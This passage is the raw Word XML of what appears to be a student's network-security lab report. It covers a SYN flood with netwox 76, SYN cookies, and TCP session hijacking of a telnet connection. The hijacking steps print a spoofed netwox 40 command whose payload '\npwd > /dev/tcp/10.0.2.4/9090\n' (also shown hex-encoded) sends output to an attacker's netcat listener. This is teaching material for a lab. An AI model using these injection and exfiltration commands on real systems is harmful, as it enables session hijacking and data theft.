          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netwox 76 is a tool to send a lot of TCP SYN packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B898E" w14:textId="7F47490B" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00B63B7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : destination IP address (the server IP address) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA28F3" w14:textId="1004392B" w:rsidR="00B63B7A" w:rsidRDefault="00B63B7A" w:rsidP="00B63B7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-p : destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6E0F0" w14:textId="77777777" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38"/>
    <w:p w14:paraId="7AB28695" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD620D6" w14:textId="615E5367" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Screenshot to show half-opened connection. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB67973" w14:textId="2291D928" w:rsidR="00901A38" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2659B4BE" wp14:editId="520BB544">
            <wp:extent cx="5261610" cy="3148965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="10" name="Picture 10"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screen&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="8198"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5261610" cy="3148965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50449624" w14:textId="69DAB7AC" w:rsidR="00B63B7A" w:rsidRDefault="00B63B7A" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C525BE" wp14:editId="329C898C">
            <wp:extent cx="5181600" cy="3823913"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 1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99805" cy="3837348"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E0419" w14:textId="571C223C" w:rsidR="00032ACA" w:rsidRDefault="00032ACA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A450A" w14:textId="77777777" w:rsidR="00901A38" w:rsidRPr="00FD28A0" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651F2784" w14:textId="52E329BF" w:rsidR="005220BE" w:rsidRPr="00FD28A0" w:rsidRDefault="00901A38">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD28A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>4. Show the changes caused by turning on or off net.ipv4.tcp_syncookies and explain the reason of the changes. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8B6C1" w14:textId="5B8FC0F6" w:rsidR="005220BE" w:rsidRDefault="00FD28A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B738D1" wp14:editId="09E2C442">
            <wp:extent cx="6645910" cy="2498090"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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6645910" cy="2498090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA84EB" w14:textId="23FA0643" w:rsidR="00FD28A0" w:rsidRDefault="00FD28A0"/>
    <w:p w14:paraId="49CEF87A" w14:textId="5FCFE87E" w:rsidR="00FD28A0" w:rsidRDefault="00FD28A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461710F3" wp14:editId="318B0C6D">
            <wp:extent cx="6645910" cy="4224655"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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645910" cy="4224655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="262EE1B0" w14:textId="77777777" w:rsidR="005220BE" w:rsidRDefault="005220BE"/>
    <w:p w14:paraId="795F746A" w14:textId="2D7DEC68" w:rsidR="00505F46" w:rsidRDefault="00FD28A0">
      <w:r>
        <w:t xml:space="preserve">Reason: </w:t>
      </w:r>
      <w:r w:rsidR="00F62E60">
        <w:t xml:space="preserve">By using SYN cookies, the server does not allocate any resources after receiving only SYN packets. The resources will only be allocated after the server has received the final ACK packet. The SYN cookies mechanism uses the sequence numbers to encode information. After the server receives the SYN packet, it calculates a hash key with IP address, port number, and sequence number. The hash value is sent back to client via the server’s SYN-ACK packet. The hash (H) is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F62E60">
        <w:t>syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F62E60">
        <w:t xml:space="preserve"> cookie. If the client is an attacker, they will not receive the packet because the IP address is fake. If the client is legitimate, they will receive the SYN+ACK packet and will send back an ACK packet with H+1 value in the acknowledgement field. When the server receives the ACK packet with H+1 value, it will recalculate the cookie or H using the information in the packet. </w:t>
      </w:r>
      <w:r w:rsidR="00505F46">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6331A1" w14:textId="5D1E95A3" w:rsidR="00C550FB" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3 (50 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73AEAC" w14:textId="77777777" w:rsidR="00C550FB" w:rsidRDefault="00C550FB" w:rsidP="00C550FB"/>
    <w:p w14:paraId="5000FDBC" w14:textId="77777777" w:rsidR="00C550FB" w:rsidRPr="006B1D6F" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>1. Describe how to inject a "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">" command using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, and explain the meaning of the command line arguments. Use screenshots to show the results using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>. (20 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5112FBDF" w14:textId="53C4D99C" w:rsidR="00C550FB" w:rsidRDefault="0079219A" w:rsidP="00C550FB">
      <w:r>
        <w:t>Server IP = 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD1821" w14:textId="1714B079" w:rsidR="0079219A" w:rsidRDefault="0079219A" w:rsidP="00C550FB">
      <w:r>
        <w:t>Client IP = 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2C3A3" w14:textId="254BB6F1" w:rsidR="0079219A" w:rsidRDefault="0079219A" w:rsidP="00C550FB">
      <w:r>
        <w:t>Attacker IP = 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B601E8" w14:textId="77777777" w:rsidR="00424C3B" w:rsidRDefault="00424C3B" w:rsidP="00C550FB"/>
    <w:p w14:paraId="3C74DD4C" w14:textId="18DA35F4" w:rsidR="00A67545" w:rsidRDefault="00A67545" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step1: </w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t xml:space="preserve">Client establishes connection with server w/ command </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>telnet 10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t>6”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1838B2AD" w14:textId="5AC7A84A" w:rsidR="00A67545" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388FFEB8" wp14:editId="68E1ADD0">
            <wp:extent cx="6103917" cy="3249771"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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22753" cy="3259799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26880E69" w14:textId="62D9C47B" w:rsidR="00A67545" w:rsidRDefault="00A67545" w:rsidP="00C550FB"/>
    <w:p w14:paraId="57537CE5" w14:textId="52251551" w:rsidR="00A67545" w:rsidRDefault="00A67545" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Attacker sniffs the packet using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. From here we can see that the destination port number is 23, source port number is </w:t>
      </w:r>
      <w:r w:rsidR="004473B2" w:rsidRPr="004473B2">
        <w:t>59774</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the sequence number is </w:t>
      </w:r>
      <w:r w:rsidR="004473B2" w:rsidRPr="004473B2">
        <w:t>2181164136</w:t>
      </w:r>
      <w:r w:rsidR="00455111">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t xml:space="preserve">The acknowledge number is </w:t>
      </w:r>
      <w:r w:rsidR="004473B2" w:rsidRPr="004473B2">
        <w:t>2282574859</w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF4DB6" w14:textId="1BFFFCCB" w:rsidR="00455111" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4691AEAB" wp14:editId="6C525E0F">
            <wp:extent cx="6519719" cy="4367656"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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36963" cy="4379208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B32C6B" w14:textId="0DF9419F" w:rsidR="00455111" w:rsidRDefault="00455111" w:rsidP="00C550FB"/>
    <w:p w14:paraId="14D18464" w14:textId="715013FA" w:rsidR="0079219A" w:rsidRDefault="0079219A" w:rsidP="00C550FB"/>
    <w:p w14:paraId="6807A248" w14:textId="3FEF26E5" w:rsidR="0079219A" w:rsidRDefault="00A67545" w:rsidP="00C550FB">
      <w:r>
        <w:t>Step 3: finding the hex abbreviation for “</w:t>
      </w:r>
      <w:r w:rsidR="004473B2">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004473B2">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004473B2">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004473B2">
        <w:t xml:space="preserve">/10.0.2.4/9090\n </w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4071E" w14:textId="120E9B2F" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">This runs the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and sends the result to the port 9090 at IP 10.0.2.4 (the attacker’s machine)</w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t>. If you don’t have the “&gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00424C3B">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00424C3B">
        <w:t>/10.0.2.4/9090\n” command, the attacker will be able to inject the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00424C3B">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00424C3B">
        <w:t xml:space="preserve">” into the server@10.0.2.6 but will not be able to view the content of the command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322BA3D5" w14:textId="68C9D07E" w:rsidR="00A67545" w:rsidRDefault="00A67545" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">$ python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21505F06" w14:textId="1A1AAC1E" w:rsidR="00A67545" w:rsidRDefault="00A67545" w:rsidP="00C550FB">
      <w:r>
        <w:t>&gt;&gt; s</w:t>
      </w:r>
      <w:r w:rsidR="00AE0E15" w:rsidRPr="00AE0E15">
        <w:t xml:space="preserve"> = "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0E15" w:rsidRPr="00AE0E15">
        <w:t>npwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0E15" w:rsidRPr="00AE0E15">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0E15" w:rsidRPr="00AE0E15">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0E15" w:rsidRPr="00AE0E15">
        <w:t>/10.0.2.4/9090\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672CCC8B" w14:textId="4F4EF2CA" w:rsidR="009B75DF" w:rsidRDefault="009B75DF" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“utf-8).hex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0607CE" w14:textId="44AA2C43" w:rsidR="009B75DF" w:rsidRDefault="009B75DF" w:rsidP="00F91CF5">
      <w:r w:rsidRPr="009B75DF">
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidR="00F91CF5" w:rsidRPr="00F91CF5">
        <w:t>﻿'0a707764203e202f6465762f7463702f31302e302e322e342f393039300a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E5967" w14:textId="5012832C" w:rsidR="00F91CF5" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B6AA3E0" wp14:editId="7B8F6CC7">
            <wp:extent cx="5605153" cy="5254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658745" cy="530507"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="713F0E97" w14:textId="77777777" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB"/>
    <w:p w14:paraId="0A4E4C57" w14:textId="7E533630" w:rsidR="009B75DF" w:rsidRDefault="009B75DF" w:rsidP="00C550FB">
      <w:r>
        <w:t>We need to add the ‘\n’ in the string because the when client server receives the packet, it is concatenated with the previous packets that server has sent. Therefore by adding the \n line we create a new command line and executes the command ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ’</w:t>
      </w:r>
      <w:r w:rsidR="00F91CF5">
        <w:t xml:space="preserve">. Then we want the content of this command to be send to the port 9090 on the attacker’s machine at 10.0.2.4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5952D81B" w14:textId="5A3969A3" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB"/>
    <w:p w14:paraId="67966648" w14:textId="5336CE5E" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB">
      <w:r>
        <w:t>If we just want to inject the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” without bothering to see the content. We can inject the hex string for “\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">\n” into the payload instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0E5B9" w14:textId="3D1D6025" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB">
      <w:r>
        <w:t>$python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE4881" w14:textId="306194DA" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB">
      <w:r>
        <w:t>&gt;&gt; s = “\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> \n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916AA49" w14:textId="77777777" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00132BD0">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“utf-8).hex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9846A3" w14:textId="558FA23D" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>'0a7077640a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E752E" w14:textId="77777777" w:rsidR="00132BD0" w:rsidRDefault="00132BD0" w:rsidP="00C550FB"/>
    <w:p w14:paraId="30C6C4E3" w14:textId="7106AF0C" w:rsidR="00F91CF5" w:rsidRDefault="00F91CF5" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t>Attacker@10.0.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> open a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port 9090 on attacking machine with the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 9090 -v”. The -v means verbose which is have more detail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C662F2" w14:textId="118DE55D" w:rsidR="00F91CF5" w:rsidRDefault="00F91CF5" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E2C1354" wp14:editId="2AEA7EAE">
            <wp:extent cx="5582776" cy="2160384"/>
            <wp:effectExtent l="0" t="0" r="571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2677" cy="2183564"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4DB75" w14:textId="617D51D2" w:rsidR="00F91CF5" w:rsidRDefault="00F91CF5" w:rsidP="00C550FB"/>
    <w:p w14:paraId="29711B33" w14:textId="261F2502" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t xml:space="preserve">Attacker@10.0.2.4 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA69BB2" w14:textId="3F22649D" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 10.0.2.5 --ip4-dst 10.0.2.6 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 59774 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 23 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 2181164136 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 2282574859 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>-ack --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>-window 501 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>-data '0a707764203e202f6465762f7463702f31302e302e322e342f393039300a' --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>spoofip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> "best"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AB866" w14:textId="47D310DA" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
